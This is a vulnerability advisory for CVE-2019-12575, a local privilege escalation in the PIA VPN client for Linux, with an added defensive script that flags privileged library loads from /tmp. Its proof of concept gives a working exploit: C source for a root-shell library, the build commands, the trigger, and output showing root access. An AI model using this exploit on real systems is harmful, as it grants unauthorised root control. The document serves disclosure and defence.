ASA-2019-00381 – London Trust Media Private Internet Access: Shared Object Injection


Allele Security Alert

ASA-2019-00381

Identifier(s)

ASA-2019-00381, CVE-2019-12575

Title

Shared Object Injection

Vendor(s)

London Trust Media

Product(s)

Private Internet Access (PIA) VPN Client

Affected version(s)

Private Internet Access (PIA) VPN Client for Linux version v82

Fixed version(s)

Private Internet Access (PIA) VPN Client for Linux version v1.2.1 or later

Proof of concept

Yes

Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN Client v82 for Linux could allow an authenticated, local attacker to run arbitrary code with elevated privileges.

Technical details

The PIA Linux binary root_runner.64 is setuid root. This binary executes /opt/pia/ruby/64/ruby, which in turn attempts to load several shared libraries from under /tmp/ruby-deploy.old/lib. Because /tmp is writable by every local user, an unprivileged user can place a malicious library at one of those paths and have it loaded, and its code executed, as the root user.
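The weakness above is a privileged process resolving shared objects from a world-writable directory. The following added example (not part of the advisory or the PIA client) shows the defender-side check: it parses openat() calls in the shape `strace -f -e trace=openat` prints them and flags every shared-object lookup that resolves under /tmp, /var/tmp or /dev/shm, whether or not the file exists yet. The trace lines, the `SAMPLE_TRACE` constant and the function names are constructed for this example.

```python
"""Flag shared-object lookups by a privileged process that resolve under
world-writable directories.  Input is text in the form produced by
`strace -f -e trace=openat <setuid-binary>`.  The sample lines below are
constructed for this example, not captured from the PIA client."""
import os
import re
from pathlib import PurePosixPath

# Constructed strace-style sample (hypothetical paths modelled on the advisory).
SAMPLE_TRACE = """\
openat(AT_FDCWD, "/opt/pia/ruby/64/lib/libruby.so.2.4", O_RDONLY|O_CLOEXEC) = 3
openat(AT_FDCWD, "/tmp/ruby-deploy.old/lib/ruby/2.4.0/enc/encdb.so", O_RDONLY|O_CLOEXEC) = -1 ENOENT (No such file or directory)
openat(AT_FDCWD, "/lib/x86_64-linux-gnu/libc.so.6", O_RDONLY|O_CLOEXEC) = 4
openat(AT_FDCWD, "/tmp/ruby-deploy.old/lib/ruby/2.4.0/x86_64-linux/enc/encdb.so", O_RDONLY|O_CLOEXEC) = 5
"""

# Directories that any local user may write to; a privileged loader must never
# pick code up from here.
UNTRUSTED_ROOTS = ("/tmp", "/var/tmp", "/dev/shm")

# openat(AT_FDCWD, "<path>", ...) -> capture <path>
OPENAT_RE = re.compile(r'openat\([^,]+,\s*"([^"]+)"')
# libfoo.so, libfoo.so.6, libfoo.so.2.4, encdb.so.so ...
SHARED_OBJECT_RE = re.compile(r"\.so(\.|$)")


def is_under_untrusted_root(path):
    """True when path is one of the untrusted roots or lies below one."""
    p = PurePosixPath(path)
    for root in UNTRUSTED_ROOTS:
        r = PurePosixPath(root)
        if p == r or r in p.parents:
            return True
    return False


def find_untrusted_loads(trace_text):
    """Return [(path, status)] for every shared-object lookup under an
    untrusted root.  status is "present" when the open succeeded and
    "absent" when it failed with ENOENT; an absent path is still a finding,
    because a local user can create it before the next privileged run."""
    findings = []
    for line in trace_text.splitlines():
        m = OPENAT_RE.search(line)
        if not m:
            continue
        path = m.group(1)
        if not SHARED_OBJECT_RE.search(PurePosixPath(path).name):
            continue
        if is_under_untrusted_root(path):
            status = "absent" if "ENOENT" in line else "present"
            findings.append((path, status))
    return findings


def deepest_existing_ancestor_is_world_writable(path):
    """Filesystem check for the same condition: walk up from path to the
    deepest component that exists and report whether others may write to it
    (o+w, e.g. /tmp).  Used when auditing a live host rather than a trace."""
    p = PurePosixPath(path)
    while not os.path.exists(str(p)) and p != p.parent:
        p = p.parent
    mode = os.stat(str(p)).st_mode
    return bool(mode & 0o002)


if __name__ == "__main__":
    for path, status in find_untrusted_loads(SAMPLE_TRACE):
        print(f"UNTRUSTED LOAD ({status}): {path}")
```

Run against a real trace, every line the script prints is a path a privileged program would execute code from if a local user created the file; the fix on the vendor side is to resolve libraries only from root-owned, non-world-writable locations (the v1.2.1 release listed above), and on the host side the same paths are what an auditor checks with the filesystem helper.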

All steps are executed as a low-privileged user.

Step 1 – Create the following directory

mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc

Step 2 – Create woot.c to execute a shell when loaded

cat >woot.c<<EOF
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>
/* Entry point run by the dynamic loader at load time (see -Wl,-init,woot in step 3). */
void woot(){
setreuid(0,0);                   /* set the real uid to match the effective uid inherited from the setuid binary */
execl("/bin/sh","/bin/sh",NULL); /* replace the process image with a shell */
}
EOF

Step 3 – Compile the malicious library

gcc -fPIC -o woot.o -Wall -c woot.c
gcc -Wall \
-shared \
-Wl,-soname,encdb.so.so \
-Wl,-init,woot \
-o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o

Step 4 – Execute root_runner.64

/opt/pia/root_runner/root_runner.64

Example

user1@woot:~$ id
uid=1001(user1) gid=1001(user1) groups=1001(user1)
user1@woot:~$ ./pia-ruby-exploit.sh
+ LIBPATH=/tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ mkdir -p /tmp/ruby-deploy/lib/ruby/2.4.0/enc
+ cat
+ gcc -fPIC -o woot.o -Wall -c woot.c
+ gcc -Wall -shared -Wl,-soname,encdb.so.so -Wl,-init,woot -o /tmp/ruby-deploy/lib/ruby/2.4.0/enc/encdb.so.so woot.o
+ /opt/pia/root_runner/root_runner.64
# id
uid=0(root) gid=1001(user1) groups=1001(user1)
#

Credits

Rich Mirch

Reference(s)

PIA Linux, macOS Privilege Escalation: Shared Object Injection
https://github.com/mirchr/security-research/blob/master/vulnerabilities/PIA/CVE-2019-12575.txt

CVE-2019-12575
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12575

CVE-2019-12575
https://nvd.nist.gov/vuln/detail/CVE-2019-12575

If there is any error in this alert or you wish a comprehensive analysis, let us know.

Last modified: June 25, 2019

We are not responsible for any data loss, device corruption or any other type of issue due to the use of any information mentioned in our security alerts.